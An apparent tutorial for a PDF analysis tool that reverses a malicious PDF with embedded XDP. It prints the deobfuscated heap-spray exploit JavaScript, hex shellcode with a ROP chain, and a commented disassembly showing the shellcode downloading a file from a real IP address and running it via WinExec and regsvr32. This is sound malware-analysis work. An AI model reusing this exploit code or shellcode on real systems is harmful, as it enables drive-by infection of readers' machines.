Version 2.6 of Profiler was released recently, and one of its improvements is support for XDP. For those of you who are unfamiliar with XDP, here’s the Wikipedia description:
“XML Data Package (XDP) is an XML file format created by Adobe Systems in 2003. It is intended to be an XML-based companion to PDF. It allows PDF content and/or Adobe XML Forms Architecture (XFA) resources to be packaged within an XML container.
XDP is XML 1.0 compliant. The XDP may be a standalone document or it may in turn be carried inside a PDF document.
XDP provides a mechanism for packaging form components within a surrounding XML container. An XDP can also package a PDF file, along with XML form and template data. When the XFA (XML Forms Architecture) grammars used for an XFA form are moved from one application to another, they must be packaged as an XML Data Package.”
So I’ll take the occasion to show how to reverse a nice PDF with all the goodies. Let’s open the suspicious PDF.
The PDF is already heavily flagged by Profiler, as it contains many suspicious features.
If we take a look, just out of curiosity, at object 8 of the PDF, we notice that the XDP data contains a bogus endstream keyword meant to fool the parsers of security solutions.
Profiler handles this correctly, so we don’t have to do anything; it’s just worth mentioning.
Let’s take a look at the raw XDP data.
As you can see, it is completely unreadable because of the XML-escaped characters. This isn’t really important for us either, since Profiler’s XML parser handles it automatically; again, it’s just worth mentioning.
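To give an idea of what the XML parser undoes here, this is a minimal sketch of entity decoding. The helper name and the sample input are made up for illustration and are not taken from the analyzed file; Profiler's own parser is certainly more complete.

```javascript
// Hypothetical helper: decodes the five predefined XML entities and
// numeric character references (decimal and hexadecimal) in one pass.
function decodeXmlEntities(text) {
    var named = { lt: '<', gt: '>', amp: '&', quot: '"', apos: "'" };
    return text.replace(/&(#x[0-9a-fA-F]+|#[0-9]+|[a-zA-Z]+);/g, function (match, body) {
        if (body.charAt(0) === '#') {
            var code = (body.charAt(1) === 'x')
                ? parseInt(body.substring(2), 16)
                : parseInt(body.substring(1), 10);
            return String.fromCodePoint(code);
        }
        // Unknown named entities are left untouched.
        return named.hasOwnProperty(body) ? named[body] : match;
    });
}

// Made-up sample, only to show the effect.
var sample = '&lt;script&gt;&#x76;&#97;r a;&lt;/script&gt;';
console.log(decodeXmlEntities(sample)); // prints: <script>var a;</script>
```

Since the replacement happens in a single pass, a doubly escaped sequence such as &amp;lt; is decoded only once.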
So let’s open the embedded XDP child directly, where we can see readable and nicely indented XML.
We can see that the XML contains JavaScript code, but Profiler already warns us of this. So let’s just click on the warning.
The code isn’t readable. So let’s select the JavaScript portion and then press Ctrl+R->Beautify JavaScript.
Much better, isn’t it?
The code is quite easy to understand although it’s obfuscated. It takes a value straight from the XDP, processes it and then calls eval on it.
This is the value it takes:
What we want is the result of the processing before eval is called. So I slightly modified the JavaScript code like this:
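ar = [HUGE STRING];        // the value taken from the XDP (elided here)
ar = ar.split('%%%');      // the entries are separated by '%%%'
s = Array();
cc = {
    q: "var pding;b,cefhots_x=wAy()l1'420657839u{.VS'<+I}*/DkR%-W[]mCj^?:LBKQYEUqFM"
}.q;                       // substitution alphabet
function test3()
{
    if (s) v = ar[z] * 1;  // convert the current entry to a number
    s = s + cc[v + 24];    // append the matching character of the alphabet
}
for (i = 0; i - 3794 < 0; i++)
{
    z = i;
    test3();
}
print(s);                  // print the decoded code instead of calling eval on it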
I didn't paste the entire value here because it is way too big, but I did paste it in the code editor:
At this point, we can just press Ctrl+R->Debug/Execute JavaScript and get the result of the execution.
We will get the following code:
var padding;
var bbb, ccc, ddd, eee, fff, ggg, hhh;
var pointers_a, i;
var x = new Array();
var y = new Array();
var _l1 = '4c20600f0517804a3c20600f0f63804aa3eb804a3020824a6e2f804a41414141260000000000000000000000000000001239804a6420600f0004000041414141414141416683e4fcfc85e47534e95f33c0648b40308b400c8b701c568b760833db668b5e3c0374332c81ee1510ffffb88b4030c346390675fb87342485e47551e9eb4c51568b753c8b74357803f5568b762003f533c94941fcad03c533db0fbe1038f27408c1cb0d03da40ebf13b1f75e65e8b5e2403dd668b0c4b8d46ecff54240c8bd803dd8b048b03c5ab5e59c3eb53ad8b6820807d0c33740396ebf38b68088bf76a0559e898ffffffe2f9e80000000058506a4068ff0000005083c01950558bec8b5e1083c305ffe3686f6e00006875726c6d54ff1683c4088be8e861ffffffeb02eb7281ec040100008d5c240cc7042472656773c744240476723332c7442408202d73205368f8000000ff560c8be833c951c7441d0077706274c7441d052e646c6cc6441d0900598ac1043088441d0441516a006a0053576a00ff561485c075166a0053ff56046a0083eb0c53ff560483c30ceb02eb1347803f0075fa47803f0075c46a006afeff5608e89cfeffff8e4e0eec98fe8a0e896f01bd33ca8a5b1bc64679361a2f70687474703a2f2f3132392e3132312e3233312e3138382f646174612f486f6d652f772e7068703f663d313626653d340000';
var _l2 = '4c20600fa563804a3c20600f9621804a901f804a3090844a7d7e804a41414141260000000000000000000000000000007188804a6420600f0004000041414141414141416683e4fcfc85e47534e95f33c0648b40308b400c8b701c568b760833db668b5e3c0374332c81ee1510ffffb88b4030c346390675fb87342485e47551e9eb4c51568b753c8b74357803f5568b762003f533c94941fcad03c533db0fbe1038f27408c1cb0d03da40ebf13b1f75e65e8b5e2403dd668b0c4b8d46ecff54240c8bd803dd8b048b03c5ab5e59c3eb53ad8b6820807d0c33740396ebf38b68088bf76a0559e898ffffffe2f9e80000000058506a4068ff0000005083c01950558bec8b5e1083c305ffe3686f6e00006875726c6d54ff1683c4088be8e861ffffffeb02eb7281ec040100008d5c240cc7042472656773c744240476723332c7442408202d73205368f8000000ff560c8be833c951c7441d0077706274c7441d052e646c6cc6441d0900598ac1043088441d0441516a006a0053576a00ff561485c075166a0053ff56046a0083eb0c53ff560483c30ceb02eb1347803f0075fa47803f0075c46a006afeff5608e89cfeffff8e4e0eec98fe8a0e896f01bd33ca8a5b1bc64679361a2f70687474703a2f2f3132392e3132312e3233312e3138382f646174612f486f6d652f772e7068703f663d313626653d340000';
_l3 = app;
_l4 = new Array();
function _l5()
{
var _l6 = _l3.viewerVersion.toString();
_l6 = _l6.replace('.', '');
while (_l6.length < 4) _l6 += '0';
return parseInt(_l6, 10)
}
function _l7(_l8, _l9)
{
while (_l8.length * 2 < _l9) _l8 += _l8;
return _l8.substring(0, _l9 / 2)
}
function _I0(_I1)
{
_I1 = unescape(_I1);
roteDak = _I1.length * 2;
dakRote = unescape('%u9090');
spray = _l7(dakRote, 0x2000 - roteDak);
loxWhee = _I1 + spray;
loxWhee = _l7(loxWhee, 524098);
for (i = 0; i < 400; i++) _l4[i] = loxWhee.substr(0, loxWhee.length - 1) + dakRote;
}
function _I2(_I1, len)
{
while (_I1.length < len) _I1 += _I1;
return _I1.substring(0, len)
}
function _I3(_I1)
{
ret = '';
for (i = 0; i < _I1.length; i += 2)
{
b = _I1.substr(i, 2);
c = parseInt(b, 16);
ret += String.fromCharCode(c);
}
return ret
}
function _ji1(_I1, _I4)
{
_I5 = '';
for (_I6 = 0; _I6 < _I1.length; _I6++)
{
_l9 = _I4.length;
_I7 = _I1.charCodeAt(_I6);
_I8 = _I4.charCodeAt(_I6 % _l9);
_I5 += String.fromCharCode(_I7 ^ _I8);
}
return _I5
}
function _I9(_I6)
{
_j0 = _I6.toString(16);
_j1 = _j0.length;
_I5 = (_j1 % 2) ? '0' + _j0 : _j0;
return _I5
}
function _j2(_I1)
{
_I5 = '';
for (_I6 = 0; _I6 < _I1.length; _I6 += 2)
{
_I5 += '%u';
_I5 += _I9(_I1.charCodeAt(_I6 + 1));
_I5 += _I9(_I1.charCodeAt(_I6))
}
return _I5
}
function _j3()
{
_j4 = _l5();
if (_j4 < 9000)
{
_j5 = 'o+uASjgggkpuL4BK/////wAAAABAAAAAAAAAAAAQAAAAAAAAfhaASiAgYA98EIBK';
_j6 = _l1;
_j7 = _I3(_j6)
}
else
{
_j5 = 'kB+ASjiQhEp9foBK/////wAAAABAAAAAAAAAAAAQAAAAAAAAYxCASiAgYA/fE4BK';
_j6 = _l2;
_j7 = _I3(_j6)
}
_j8 = 'SUkqADggAABB';
_j9 = _I2('QUFB', 10984);
_ll0 = 'QQcAAAEDAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAAEAAAAIAAAAFwEEAAEAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////';
_ll1 = _j8 + _j9 + _ll0 + _j5;
_ll2 = _ji1(_j7, '');
if (_ll2.length % 2) _ll2 += unescape('%00');
_ll3 = _j2(_ll2);
with(
{
k: _ll3
}) _I0(k);
qwe123b.rawValue = _ll1
}
_j3();
Basically, it sprays the heap using an array. The payload it uses depends on the version of Adobe Reader, which is retrieved by calling the _l5 function.
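To make the version check easier to follow, here is a standalone sketch of what _l5 computes. The function names are mine, and the version is passed as a parameter instead of being read from app.viewerVersion, so that it runs outside of Reader; the input values are just examples.

```javascript
// Standalone rewrite of _l5: the parameter stands in for app.viewerVersion
// (an assumption made so that the code runs outside of Adobe Reader).
function normalizeViewerVersion(viewerVersion) {
    var digits = viewerVersion.toString().replace('.', ''); // removes the first dot
    while (digits.length < 4) digits += '0';                // pads to four digits
    return parseInt(digits, 10);
}

// Same condition as in _j3: below 9000 selects _l1, otherwise _l2.
function selectedPayload(viewerVersion) {
    return normalizeViewerVersion(viewerVersion) < 9000 ? '_l1' : '_l2';
}

console.log(normalizeViewerVersion(8.1), selectedPayload(8.1)); // prints: 8100 _l1
console.log(normalizeViewerVersion(9), selectedPayload(9));     // prints: 9000 _l2
console.log(normalizeViewerVersion(9.3), selectedPayload(9.3)); // prints: 9300 _l2
```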
Now we could just examine the _l1 or _l2 payloads directly, but to be sure I let the code generate one portion of the spray. So I changed the code accordingly and avoided actually spraying a lot of data.
var padding;
var bbb, ccc, ddd, eee, fff, ggg, hhh;
var pointers_a, i;
var x = new Array();
var y = new Array();
var _l1 = '4c20600f0517804a3c20600f0f63804aa3eb804a3020824a6e2f804a41414141260000000000000000000000000000001239804a6420600f0004000041414141414141416683e4fcfc85e47534e95f33c0648b40308b400c8b701c568b760833db668b5e3c0374332c81ee1510ffffb88b4030c346390675fb87342485e47551e9eb4c51568b753c8b74357803f5568b762003f533c94941fcad03c533db0fbe1038f27408c1cb0d03da40ebf13b1f75e65e8b5e2403dd668b0c4b8d46ecff54240c8bd803dd8b048b03c5ab5e59c3eb53ad8b6820807d0c33740396ebf38b68088bf76a0559e898ffffffe2f9e80000000058506a4068ff0000005083c01950558bec8b5e1083c305ffe3686f6e00006875726c6d54ff1683c4088be8e861ffffffeb02eb7281ec040100008d5c240cc7042472656773c744240476723332c7442408202d73205368f8000000ff560c8be833c951c7441d0077706274c7441d052e646c6cc6441d0900598ac1043088441d0441516a006a0053576a00ff561485c075166a0053ff56046a0083eb0c53ff560483c30ceb02eb1347803f0075fa47803f0075c46a006afeff5608e89cfeffff8e4e0eec98fe8a0e896f01bd33ca8a5b1bc64679361a2f70687474703a2f2f3132392e3132312e3233312e3138382f646174612f486f6d652f772e7068703f663d313626653d340000';
var _l2 = '4c20600fa563804a3c20600f9621804a901f804a3090844a7d7e804a41414141260000000000000000000000000000007188804a6420600f0004000041414141414141416683e4fcfc85e47534e95f33c0648b40308b400c8b701c568b760833db668b5e3c0374332c81ee1510ffffb88b4030c346390675fb87342485e47551e9eb4c51568b753c8b74357803f5568b762003f533c94941fcad03c533db0fbe1038f27408c1cb0d03da40ebf13b1f75e65e8b5e2403dd668b0c4b8d46ecff54240c8bd803dd8b048b03c5ab5e59c3eb53ad8b6820807d0c33740396ebf38b68088bf76a0559e898ffffffe2f9e80000000058506a4068ff0000005083c01950558bec8b5e1083c305ffe3686f6e00006875726c6d54ff1683c4088be8e861ffffffeb02eb7281ec040100008d5c240cc7042472656773c744240476723332c7442408202d73205368f8000000ff560c8be833c951c7441d0077706274c7441d052e646c6cc6441d0900598ac1043088441d0441516a006a0053576a00ff561485c075166a0053ff56046a0083eb0c53ff560483c30ceb02eb1347803f0075fa47803f0075c46a006afeff5608e89cfeffff8e4e0eec98fe8a0e896f01bd33ca8a5b1bc64679361a2f70687474703a2f2f3132392e3132312e3233312e3138382f646174612f486f6d652f772e7068703f663d313626653d340000';
_l3 = this;
_l4 = new Array();
/*function _l5()
{
var _l6 = _l3.viewerVersion.toString();
_l6 = _l6.replace('.', '');
while (_l6.length < 4) _l6 += '0';
return parseInt(_l6, 10)
}*/
function _l7(_l8, _l9)
{
while (_l8.length * 2 < _l9) _l8 += _l8;
return _l8.substring(0, _l9 / 2)
}
function _I0(_I1)
{
_I1 = unescape(_I1);
roteDak = _I1.length * 2;
dakRote = unescape('%u9090');
spray = _l7(dakRote, 0x2000 - roteDak);
loxWhee = _I1 + spray;
loxWhee = _l7(loxWhee, 0x2000);
for (i = 0; i < 1; i++) _l4[i] = loxWhee.substr(0, loxWhee.length - 1) + dakRote;
}
function _I2(_I1, len)
{
while (_I1.length < len) _I1 += _I1;
return _I1.substring(0, len)
}
function _I3(_I1)
{
ret = '';
for (i = 0; i < _I1.length; i += 2)
{
b = _I1.substr(i, 2);
c = parseInt(b, 16);
ret += String.fromCharCode(c);
}
return ret
}
function _ji1(_I1, _I4)
{
_I5 = '';
for (_I6 = 0; _I6 < _I1.length; _I6++)
{
_l9 = _I4.length;
_I7 = _I1.charCodeAt(_I6);
_I8 = _I4.charCodeAt(_I6 % _l9);
_I5 += String.fromCharCode(_I7 ^ _I8);
}
return _I5
}
function _I9(_I6)
{
_j0 = _I6.toString(16);
_j1 = _j0.length;
_I5 = (_j1 % 2) ? '0' + _j0 : _j0;
return _I5
}
function _j2(_I1)
{
_I5 = '';
for (_I6 = 0; _I6 < _I1.length; _I6 += 2)
{
_I5 += '%u';
_I5 += _I9(_I1.charCodeAt(_I6 + 1));
_I5 += _I9(_I1.charCodeAt(_I6))
}
return _I5
}
function asciiToHex(str)
{
var arr = [];
for (var n = 0, l = str.length; n < l; n ++)
{
var ch = str.charCodeAt(n);
var hex = Number(ch & 0xFF).toString(16);
if (hex.length < 2) hex = "0" + hex;
arr.push(hex);
hex = Number(ch >>> 8).toString(16);
while (hex.length < 2) hex = "0" + hex;
arr.push(hex);
}
return arr.join('');
}
function _j3()
{
_j4 = 9000;
if (_j4 < 9000)
{
_j5 = 'o+uASjgggkpuL4BK/////wAAAABAAAAAAAAAAAAQAAAAAAAAfhaASiAgYA98EIBK';
_j6 = _l1;
_j7 = _I3(_j6)
}
else
{
_j5 = 'kB+ASjiQhEp9foBK/////wAAAABAAAAAAAAAAAAQAAAAAAAAYxCASiAgYA/fE4BK';
_j6 = _l2;
_j7 = _I3(_j6)
}
_j8 = 'SUkqADggAABB';
_j9 = _I2('QUFB', 10984);
_ll0 = 'QQcAAAEDAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAAEAAAAIAAAAFwEEAAEAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////';
_ll1 = _j8 + _j9 + _ll0 + _j5;
_ll2 = _ji1(_j7, '');
if (_ll2.length % 2) _ll2 += unescape('%00');
_ll3 = _j2(_ll2);
with(
{
k: _ll3
}) _I0(k);
print(asciiToHex(_l4[0]));
}
_j3();
We can run this script in the JavaScript debugger (Ctrl+R->Debug JavaScript).
The final print will give us the payload in memory. We can copy just the initial part, leaving out the padding. Let's paste the string into a text editor in Profiler and then press Ctrl+R->Hex string to bytes.
If we look at the payload, we can see that the beginning (the marked portion) looks like ROP code. To avoid having to look for the gadgets in memory, let's skip the ROP, as it is most likely only going to jump to the actual shellcode. Let's assume that this is the case and focus on the data which follows.
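A quick way to see why the beginning looks like ROP is to read it as little-endian dwords. This is only a sketch: the helper name is mine, and the input is the first 32 bytes of the _l2 string. That the values are gadget addresses remains an assumption, since we are not resolving them in memory.

```javascript
// Hypothetical helper: reads `count` little-endian 32-bit values from a hex string.
function leDwords(hex, count) {
    var out = [];
    for (var i = 0; i < count; i++) {
        var bytes = hex.substring(i * 8, i * 8 + 8).match(/../g);
        out.push(parseInt(bytes.reverse().join(''), 16)); // swap the byte order
    }
    return out;
}

// First 32 bytes of _l2.
var head = '4c20600fa563804a3c20600f9621804a901f804a3090844a7d7e804a41414141';

leDwords(head, 8).forEach(function (d) {
    console.log('0x' + ('00000000' + d.toString(16)).slice(-8));
});
// The list starts with 0x0f60204c and 0x4a8063a5 and ends with 0x41414141.
```

Most of the values fall in the same 0x4a8xxxxx range, which is what we would expect from pointers into a single module, followed by filler (0x41414141).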
We can see a web address at the end of the data. So we could just assume that the shellcode downloads an executable and runs it. But just for the sake of completeness, let's analyze it.
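If you prefer to check the address without the hex view, the tail of the payload string can be decoded with a few lines of JavaScript. The helper name is mine; the hex string is the end of _l1 (and _l2) without the two trailing null bytes.

```javascript
// Hypothetical helper: turns a hex string into the ASCII text it encodes.
function hexToAscii(hex) {
    var out = '';
    for (var i = 0; i + 1 < hex.length; i += 2) {
        out += String.fromCharCode(parseInt(hex.substring(i, i + 2), 16));
    }
    return out;
}

// End of the payload, right after the last hash value (361a2f70).
var tail = '687474703a2f2f3132392e3132312e3233312e3138382f646174612f486f6d652f772e7068703f663d313626653d34';

console.log(hexToAscii(tail)); // prints: http://129.121.231.188/data/Home/w.php?f=16&e=4
```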
We can of course disassemble the shellcode by applying a filter to it (Ctrl+T->x86 disasm). But what we'll do instead is use a debugger via Ctrl+R->Shellcode to execute. This way we can quickly step through what it does.
Here's the commented code:
00000000 66 83 E4 FC and sp, 0xfffc
00000004 FC cld
00000005 85 E4 test esp, esp
00000007 75 34 jne 0x3d
0000000A 5F pop edi
0000000B 33 C0 xor eax, eax
0000000D 64 8B 40 30 mov eax, dword ptr fs:[eax + 0x30]
00000011 8B 40 0C mov eax, dword ptr [eax + 0xc]
00000014 8B 70 1C mov esi, dword ptr [eax + 0x1c]
00000017 56 push esi
00000018 8B 76 08 mov esi, dword ptr [esi + 8]
0000001B 33 DB xor ebx, ebx
0000001D 66 8B 5E 3C mov bx, word ptr [esi + 0x3c]
00000021 03 74 33 2C add esi, dword ptr [ebx + esi + 0x2c]
00000025 81 EE 15 10 FF FF sub esi, 0xffff1015
0000002B B8 8B 40 30 C3 mov eax, 0xc330408b
00000030 46 inc esi
00000031 39 06 cmp dword ptr [esi], eax
00000033 75 FB jne 0x30
00000035 87 34 24 xchg dword ptr [esp], esi
00000038 85 E4 test esp, esp
0000003A 75 51 jne 0x8d
0000003D EB 4C jmp 0x8b
; resolve API
0000003F 51 push ecx
00000040 56 push esi
00000041 8B 75 3C mov esi, dword ptr [ebp + 0x3c]
00000044 8B 74 35 78 mov esi, dword ptr [ebp + esi + 0x78]
00000048 03 F5 add esi, ebp
0000004A 56 push esi
0000004B 8B 76 20 mov esi, dword ptr [esi + 0x20]
0000004E 03 F5 add esi, ebp
00000050 33 C9 xor ecx, ecx
00000052 49 dec ecx
00000053 41 inc ecx
00000054 FC cld
00000055 AD lodsd eax, dword ptr [esi]
00000056 03 C5 add eax, ebp
00000058 33 DB xor ebx, ebx
0000005A 0F BE 10 movsx edx, byte ptr [eax]
0000005D 38 F2 cmp dl, dh
0000005F 74 08 je 0x69
00000061 C1 CB 0D ror ebx, 0xd
00000064 03 DA add ebx, edx
00000066 40 inc eax
00000067 EB F1 jmp 0x5a
00000069 3B 1F cmp ebx, dword ptr [edi]
0000006B 75 E6 jne 0x53
0000006D 5E pop esi
0000006E 8B 5E 24 mov ebx, dword ptr [esi + 0x24]
00000071 03 DD add ebx, ebp
00000073 66 8B 0C 4B mov cx, word ptr [ebx + ecx*2]
00000077 8D 46 EC lea eax, dword ptr [esi - 0x14]
0000007A FF 54 24 0C call dword ptr [esp + 0xc]
0000007E 8B D8 mov ebx, eax
00000080 03 DD add ebx, ebp
00000082 8B 04 8B mov eax, dword ptr [ebx + ecx*4]
00000085 03 C5 add eax, ebp
00000087 AB stosd dword ptr es:[edi], eax
00000088 5E pop esi
00000089 59 pop ecx
0000008A C3 ret
0000008B EB 53 jmp 0xe0
0000008D AD lodsd eax, dword ptr [esi]
0000008E 8B 68 20 mov ebp, dword ptr [eax + 0x20]
00000091 80 7D 0C 33 cmp byte ptr [ebp + 0xc], 0x33
00000095 74 03 je 0x9a
00000097 96 xchg eax, esi
00000098 EB F3 jmp 0x8d
0000009A 8B 68 08 mov ebp, dword ptr [eax + 8]
0000009D 8B F7 mov esi, edi
0000009F 6A 05 push 5
000000A1 59 pop ecx
000000A2 E8 98 FF FF FF call 0x3f ; resolve API
000000A7 E2 F9 loop 0xa2 ; loops resolving the following APIs:
; LoadLibraryA
; WinExec
; TerminateThread
; GetTempPathA
; VirtualProtect
000000A9 E8 00 00 00 00 call 0xae
000000AE 58 pop eax
000000AF 50 push eax
000000B0 6A 40 push 0x40
000000B2 68 FF 00 00 00 push 0xff
000000B7 50 push eax
000000B8 83 C0 19 add eax, 0x19
000000BB 50 push eax
000000BC 55 push ebp
000000BD 8B EC mov ebp, esp
000000BF 8B 5E 10 mov ebx, dword ptr [esi + 0x10]
000000C2 83 C3 05 add ebx, 5
000000C5 FF E3 jmp ebx ; calls VirtualProtect with stolen bytes
000000C7 68 6F 6E 00 00 push 0x6e6f
000000CC 68 75 72 6C 6D push 0x6d6c7275 ; pushes URLMON string to stack
000000D1 54 push esp
000000D2 FF 16 call dword ptr [esi] ; calls a gadget which calls LoadLibraryA and returns the URLMON base address
000000D4 83 C4 08 add esp, 8
000000D7 8B E8 mov ebp, eax
000000D9 E8 61 FF FF FF call 0x3f ; resolves URLDownloadToFileA
000000DE EB 02 jmp 0xe2
000000E0 EB 72 jmp 0x154
000000E2 81 EC 04 01 00 00 sub esp, 0x104
000000E8 8D 5C 24 0C lea ebx, dword ptr [esp + 0xc]
000000EC C7 04 24 72 65 67+ mov dword ptr [esp], 0x73676572
000000F3 C7 44 24 04 76 72+ mov dword ptr [esp + 4], 0x32337276
000000FB C7 44 24 08 20 2D+ mov dword ptr [esp + 8], 0x20732d20 ; pushes "regsvr32 -s " to the stack
00000103 53 push ebx
00000104 68 F8 00 00 00 push 0xf8
00000109 FF 56 0C call dword ptr [esi + 0xc] ; calls GetTempPathA
0000010C 8B E8 mov ebp, eax
0000010E 33 C9 xor ecx, ecx
00000110 51 push ecx
00000111 C7 44 1D 00 77 70+ mov dword ptr [ebp + ebx], 0x74627077
00000119 C7 44 1D 05 2E 64+ mov dword ptr [ebp + ebx + 5], 0x6c6c642e
00000121 C6 44 1D 09 00 mov byte ptr [ebp + ebx + 9], 0 ; appends "wpbt0.dll" to the path
00000126 59 pop ecx
00000127 8A C1 mov al, cl
00000129 04 30 add al, 0x30
0000012B 88 44 1D 04 mov byte ptr [ebp + ebx + 4], al
0000012F 41 inc ecx
00000130 51 push ecx
00000131 6A 00 push 0
00000133 6A 00 push 0
00000135 53 push ebx
00000136 57 push edi
00000137 6A 00 push 0
00000139 FF 56 14 call dword ptr [esi + 0x14] ; calls URLDownloadToFileA with the created path with the URL: http://129.121.231.188/data/Home/w.php?f=16&e=4
0000013C 85 C0 test eax, eax
0000013E 75 16 jne 0x156
00000140 6A 00 push 0
00000142 53 push ebx
00000143 FF 56 04 call dword ptr [esi + 4] ; calls WinExec on the downloaded file
00000146 6A 00 push 0
00000148 83 EB 0C sub ebx, 0xc
0000014B 53 push ebx
0000014C FF 56 04 call dword ptr [esi + 4] ; calls WinExec on "regsvr32 -s " followed by the downloaded file
0000014F 83 C3 0C add ebx, 0xc
00000152 EB 02 jmp 0x156
00000154 EB 13 jmp 0x169
00000156 47 inc edi
00000157 80 3F 00 cmp byte ptr [edi], 0
0000015A 75 FA jne 0x156
0000015C 47 inc edi
0000015D 80 3F 00 cmp byte ptr [edi], 0
00000160 75 C4 jne 0x126
00000162 6A 00 push 0
00000164 6A FE push -2
00000166 FF 56 08 call dword ptr [esi + 8] ; calls TerminateThread
00000169 E8 9C FE FF FF call 0xa
So yes, in the end it just downloads the file from the address we've seen and tries to execute it, then tries to register it as a COM object. Some AV-evasion techniques are also present.
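As a side note, the "resolve API" routine hashes each export name with a rotate-right by 13 followed by an add (the ror ebx, 0xd / add ebx, edx pair) and compares the result with the dwords stored right before the URL. Here's a small sketch of the same computation; the function names are mine, and the table is copied from the end of the payload string.

```javascript
// 32-bit rotate right.
function ror32(value, bits) {
    return ((value >>> bits) | (value << (32 - bits))) >>> 0;
}

// Same steps as the shellcode loop: rotate the hash, then add the next character.
function ror13Hash(name) {
    var hash = 0;
    for (var i = 0; i < name.length; i++) {
        hash = ror32(hash, 13);
        hash = (hash + name.charCodeAt(i)) >>> 0;
    }
    return hash;
}

// Hash table taken from the payload (six little-endian dwords before the URL).
var table = '8e4e0eec98fe8a0e896f01bd33ca8a5b1bc64679361a2f70';
var stored = table.match(/.{8}/g).map(function (dword) {
    return parseInt(dword.match(/../g).reverse().join(''), 16);
});

// API names from the comments in the listing.
var names = ['LoadLibraryA', 'WinExec', 'TerminateThread',
             'GetTempPathA', 'VirtualProtect', 'URLDownloadToFileA'];

names.forEach(function (name) {
    var hash = ror13Hash(name);
    var found = stored.indexOf(hash) !== -1;
    console.log(name, '0x' + ('00000000' + hash.toString(16)).slice(-8),
                found ? 'found in table' : 'not in table');
});
```

The first stored dword, 0xec0e4e8e, is the hash of LoadLibraryA.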
Cheers!